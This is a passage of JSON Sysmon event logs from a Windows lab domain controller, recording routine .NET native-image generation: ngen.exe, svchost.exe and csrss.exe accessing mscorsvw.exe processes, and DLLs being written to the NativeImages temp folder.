C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.387","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010CAFC1100}","TargetProcessId":"4664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7897,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:13.622\r\nProcessGuid: {A837DB8D-04ED-5F25-0000-0010CAFC1100}\r\nProcessId: 4664\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1238-0\\System.Web.RegularExpressions.dll\r\nCreationUtcTime: 2020-08-01 06:00:13.622","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:13.622","ProcessGuid":"{A837DB8D-04ED-5F25-0000-0010CAFC1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1238-0\\System.Web.RegularExpressions.dll","CreationUtcTime":"2020-08-01 06:00:13.622","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7898,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.653\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-00105F001200}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.653","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-00105F001200}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7899,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.653\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-00105F001200}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.653","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-00105F001200}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7900,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.668\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-00105F001200}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.668","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-00105F001200}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7901,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.731\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010D1041200}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.731","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010D1041200}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7902,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010D1041200}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010D1041200}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7903,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010D1041200}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010D1041200}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7904,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:13.762\r\nProcessGuid: {A837DB8D-04ED-5F25-0000-0010D1041200}\r\nProcessId: 4012\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\fac-0\\System.Web.Routing.dll\r\nCreationUtcTime: 2020-08-01 06:00:13.762","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:13.762","ProcessGuid":"{A837DB8D-04ED-5F25-0000-0010D1041200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\fac-0\\System.Web.Routing.dll","CreationUtcTime":"2020-08-01 06:00:13.762","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7905,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.793\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001047CE1000}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Window